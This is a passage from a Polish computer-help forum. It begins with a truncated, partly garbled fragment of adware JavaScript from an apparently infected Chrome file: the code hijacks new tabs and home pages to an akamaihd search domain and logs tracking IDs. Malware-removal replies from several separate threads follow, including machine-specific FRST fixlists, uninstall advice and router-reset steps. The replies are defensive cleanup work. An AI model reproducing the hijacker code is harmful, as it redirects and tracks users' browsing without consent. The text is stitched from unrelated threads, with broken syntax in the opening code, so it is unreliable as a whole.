b[a];f(})});chrome.tabs.onCreated.addListener(function(a){if(a.id&&!a.openerTabId)if(d.firstRun){if(m(a.url))return;chrome.tabs.update(a.id,{url:"http://searchinterneat-a.akamaihd.net/h?eq=U0EeCFZVBB8SRggVdF8PUFsVQxhFIlwATA1IQAwOeQFaBxQSGAxAeAoOAw4SGQAFIk0FA1oDB0VXfVtUBlpXTwhuL1ddGG8YSlxNJw=="});k(["BL_YS_Action_2","MoneyViking","64f71bdb-fbe8-49a9-98bf-c99c836b7c85","blgc","HomePage",a.url])}else-1==t.indexOf(a.url)||m(a.url)||(chrome.tabs.update(a.id,{url:"http://searchinterneat-a.akamaihd.net/t?eq=U0EeFFhaR1oWHAMXJg4JA10TDFNBJQEVVQAQGBgaeFteTFpIGFYbcw9aVlpJFBNBNARaAktXUUEeIlVfAh8fHHhMLlxBN1AaSFtE"}),k(["BL_YS_Action_2","MoneyViking","64f71bdb-fbe8-49a9-98bf-c99c836b7c85","blgc","NewTab",a.url]));else a.openerTabId&&h(function({b||(b={});b[a.id]=b[a.openerTabId];f(});d.firstRun=!1});chrome.webNavigation.onBeforeNavigate.addListener(function(a){0===a.frameId&&r(a.tabId,{url:a.url})});chrome.tabs.onUpdated.addListener(function(a,b,d){A(a,b,d)})})(window,document)}catch(d){};// Copyright 2013 The Chromium Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be // found in the LICENSE file. Rozwiązaniem byłaby albo podmiana tego pliku starszą kopią (był w folderze niezmodyfikowany plik resources.bak), albo reinstalacja przeglądarki nadpisująca zawartość katalogu Program files. To drugie już wykonałeś. Natomiast jeśli chodzi o inne zagadnienia widoczne w raportach: 1. Odinstaluj: Anvi Smart Defender 2.5 (słaby program), Java 7 Update 65 (stara wersja), McAfee Security Scan Plus (sponsor instalacji Adobe Flash), Update for PriceFountain (adware). 2. Drobny skrypt usuwający odpadkowe wpisy. Otwórz Notatnik i wklej w nim: CloseProcesses: CreateRestorePoint: Task: C:\WINDOWS\Tasks\At1.job => C:\DOCUME~1\Brim\DANEAP~1\PRICEF~1\UPDATE~1\UPDATE~1.EXE SecurityProviders: msapsspc.dll, schannel.dll, digest.dll, msnsspc.dll, mcenspc.dll Toolbar: HKU\S-1-5-21-4124746199-4171654727-105604383-1006 -> Brak nazwy - {A13C2648-91D4-4BF3-BC6D-0079707C4389} - Brak pliku HKU\S-1-5-21-4124746199-4171654727-105604383-1006\...\Run: [Polar Sync] => [X] HKLM\...\Policies\Explorer: [NoCDBurning] 0 DeleteKey: HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\mountpoints2 DeleteKey: HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\KernelFaultCheck DeleteKey: HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\SunJavaUpdateSched DeleteKey: HKLM\SOFTWARE\Mozilla DeleteKey: HKLM\SOFTWARE\MozillaPlugins DeleteKey: HKU\S-1-5-18\Software\Microsoft\Internet Explorer\SearchScopes DeleteKey: HKU\S-1-5-19\Software\Microsoft\Internet Explorer\SearchScopes DeleteKey: HKU\S-1-5-20\Software\Microsoft\Internet Explorer\SearchScopes RemoveDirectory: C:\Program Files\Winsere RemoveProxy: EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, system zostanie zresetowany. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 3. Zrób nowy log FRST z opcji Skanuj (Scan), zaznacz pole Addition, by powstały dwa logi. Dołącz też plik fixlog.txt.

Uruchomiłeś ponownie stary Fixlog z poprzedniej rundy, a nie nowy. Zapisz ponownie plik z danymi z mojego ostatniego posta i wykonaj. I skoro były zmiany w oprogramowaniu, to na wszelki wypadek zrób nowe raporty FRST (FRST.txt + Addition.txt). PS. Dziś znalazłam drugi temat i go tu dokleiłam. Czy poniższy problem nadal aktualny?

Wielkie dzięki za dotację. Temat rozwiązany. Zamykam.

O ile problem nadal aktualny, rozpocznij od poprawnej deinstalacji adware/PUP, doczyszczanie zostanie przeprowadzone w drugim etapie: 1. Klawisz z flagą Windows + X > Programy i funkcje > odinstaluj: do-search uninstall, McAfee Security Scan Plus, mystartsearch, qksee, REACHit, Strong Signal, WarThunder, WinZip (to fałszywa kopia a nie WinZip marki Corel). Jeśli któraś pozycja będzie niewidoczna lub zwróci błąd deinstalacji, kontynuuj. 2. Zrób nowy log FRST z opcji Skanuj (Scan), zaznacz pola Addition i Shortcut, by powstały trzy logi.

O ile problem nadal aktualny: Na dysku widać pliki "Asystenta pobierania" dobrychprogramów, a nie instalatory właściwe. Czym grozi pobieranie z tego serwisu: KLIK. Prawdopodobnie PriceFountain zostało właśnie nabyte z "Asystenta" dobrychprogramów. 1. Otwórz Notatnik i wklej w nim: CloseProcesses: CreateRestorePoint: Task: {4DA9E859-EB4F-4B12-B0A0-75903EAA81FC} - System32\Tasks\wwwFrenzyingReluctantlyV2 => Rundll32.exe ProcuringCooperators.dll,main 7 1 CHR HKLM\SOFTWARE\Policies\Google: Ograniczenia CHR HKLM\...\Chrome\Extension: [ajcmdlkeklfmbjffnlofgfkjcnpfckab] - hxxps://clients2.google.com/service/update2/crx CHR HKLM\...\Chrome\Extension: [ljibkigjccbegnbeojkoafejpoiachej] - hxxps://clients2.google.com/service/update2/crx CHR HKU\S-1-5-21-1093597737-154638444-1121763440-1000\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [ajcmdlkeklfmbjffnlofgfkjcnpfckab] - hxxps://clients2.google.com/service/update2/crx CHR HKLM-x32\...\Chrome\Extension: [ajcmdlkeklfmbjffnlofgfkjcnpfckab] - hxxps://clients2.google.com/service/update2/crx CustomCLSID: HKU\S-1-5-21-1093597737-154638444-1121763440-1000_Classes\CLSID\{1423F872-3F7F-4E57-B621-8B1A9D49B448}\InprocServer32 -> C:\Users\www\AppData\Local\Google\Update\1.3.27.5\psuser_64.dll => Brak pliku CustomCLSID: HKU\S-1-5-21-1093597737-154638444-1121763440-1000_Classes\CLSID\{5C8C2A98-6133-4EBA-BBCC-34D9EA01FC2E}\InprocServer32 -> C:\Users\www\AppData\Local\Google\Update\1.3.28.1\psuser_64.dll => Brak pliku CustomCLSID: HKU\S-1-5-21-1093597737-154638444-1121763440-1000_Classes\CLSID\{78550997-5DEF-4A8A-BAF9-D5774E87AC98}\InprocServer32 -> C:\Users\www\AppData\Local\Google\Update\1.3.28.13\psuser_64.dll => Brak pliku CustomCLSID: HKU\S-1-5-21-1093597737-154638444-1121763440-1000_Classes\CLSID\{C3BC25C0-FCD3-4F01-AFDD-41373F017C9A}\InprocServer32 -> C:\Users\www\AppData\Local\Google\Update\1.3.26.9\psuser_64.dll => Brak pliku CustomCLSID: HKU\S-1-5-21-1093597737-154638444-1121763440-1000_Classes\CLSID\{CC182BE1-84CE-4A57-B85C-FD4BBDF78CB2}\InprocServer32 -> C:\Users\www\AppData\Local\Google\Update\1.3.29.1\psuser_64.dll => Brak pliku CustomCLSID: HKU\S-1-5-21-1093597737-154638444-1121763440-1000_Classes\CLSID\{D1EDC4F5-7F4D-4B12-906A-614ECF66DDAF}\InprocServer32 -> C:\Users\www\AppData\Local\Google\Update\1.3.28.15\psuser_64.dll => Brak pliku SearchScopes: HKLM -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = SearchScopes: HKU\S-1-5-21-1093597737-154638444-1121763440-1000 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = StartMenuInternet: IEXPLORE.EXE - iexplore.exe HKLM-x32\...\Run: [] => [X] HKU\S-1-5-18\Control Panel\Desktop\\SCRNSAVE.EXE -> FirewallRules: [{193E347A-284F-4458-9324-04C3019D4CAF}] => (Allow) C:\Program Files (x86)\GlassWire\GWCtlSrv.exe FirewallRules: [{9A947D63-73A4-4D79-91B3-E1E1096D155A}] => (Allow) C:\Program Files (x86)\GlassWire\GWCtlSrv.exe DeleteKey: HKCU\Software\1Q1F1S1C1P1E1C1F1N1C1T1H2UtF1E1I DeleteKey: HKCU\Software\dobreprogramy DeleteKey: HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\GlassWire DeleteKey: HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\GoogleChromeAutoLaunch_27DB4C2F86F0ABF2C4415F947F94FFA3 RemoveDirectory: C:\ProgramData\GlassWire RemoveDirectory: C:\Users\www\AppData\Local\FrenzyingReluctantly RemoveDirectory: C:\Users\www\AppData\Local\GlassWire C:\Users\Public\Desktop\My Software Deals.url C:\Users\www\AppData\Roaming\Setup32217.exe C:\Users\www\Downloads\*-dp* EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, system zostanie zresetowany. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 2. W Google Chrome: Zresetuj synchronizację (o ile włączona): KLIK. Ustawienia > karta Rozszerzenia > odinstaluj BestY NewTab, o ile nadal będzie widoczny po w/w operacji. Ustawienia > karta Ustawienia > Pokaż ustawienia zaawansowane > zjedź na sam spód i uruchom opcję Resetowanie ustawień. Zakładki i hasła nie zostaną naruszone. 3. Zrób nowy log FRST z opcji Skanuj (Scan), bez Addition i Shortcut. Dołącz też plik fixlog.txt.

Fix wykonany. Znajome końcowe czynności, czyli DelFix i czyszczenie folderów Przywracania systemu: KLIK. Temat zamykam.

Czyszczenie lokalizacji tymczasowych już tu było prowadzone (komenda EmptyTemp: w skrypcie FRST). Windows ma zainstalowany SP1 i IE11. W pierwszym raporcie Addition była owszem ciut starsza wersja Adobe Reader i Java, ale to stan sprzed miesiąca - jeśli nadal są te same wersje, to oczywiście możesz je zaktualizować. DelFix przeprowadził operacje. Skasuj z dysku plik C:\delfix.txt. Temat rozwiązany. Zamykam.

DelFix wykonał co należy. Skasuj z dysku plik C:\delfix.txt. Temat infekcji rozwiązany. Zamykam. Gdyby coś się działo, poproś na PW o otworzenie.

Jaki plik / skąd pobierany? Czy pliki z innych serwerów też pobierają się bardzo powoli? "Połączenia IPv6: Brak dostępu do sieci" to standardowy odczyt, jeśli jest używane IPv4 dla danego połączenia. U mnie jest taki sam stan i nie ma to żadnego wpływu na szybkość pobierania danych.

Czy nadal występuje u Ciebie tytułowy komunikat? Natomiast Fix FRST w większości pomyślnie wykonany. Jeden wpis adware w Google Chrome nie został przetworzony. Pod tym kątem: Zresetuj synchronizację (o ile włączona), punkt 2: KLIK. Ustawienia > karta Ustawienia > Wygląd i zaznacz "Pokaż przycisk strony startowej" > klik w Zmień i usuń adres trovi.com.

DelFix zgłupiał nieco i skasował jeden plik omyłkowo, czyli ten skrót z Pulpitu: Shortcut: G:\Documents and Settings\All Users\Pulpit\MKV File Player.lnk -> G:\Program Files\MKV File Player\MKVFilePlayer.exe () Ale szkody żadne, po prostu skrót ręcznie odtworzysz. Skasuj z dysku plik raportu G:\delfix.txt. To wszystko.

Tematy łączę razem. Tcpip\Parameters: [DhcpNameServer] 91.205.74.25 8.8.8.8 Tcpip\..\Interfaces\{1382FDDA-8333-4C5C-991C-992485EDAF2F}: [DhcpNameServer] 91.205.74.25 8.8.8.8 Niewiele już chyba mogę tu poradzić, skoro aktualizacja firmware i konfiguracja wg wytycznych są mało skuteczne. Jako ostatni krok zresetuj router do ustawień fabrycznych posługując się przyciskiem na obudowie. Po resecie wejdź do konfiguracji i zmień hasło na inne niż poprzednio używane, upewnij się też że dostęp od strony internetu jest zamknięty. Jeśli pomimo tych działań nadal router będzie przejmowany przez infekcję, zostaje bezpośredni kontakt z producentem sprzętu i/lub wymiana routera na bezpieczniejszy model.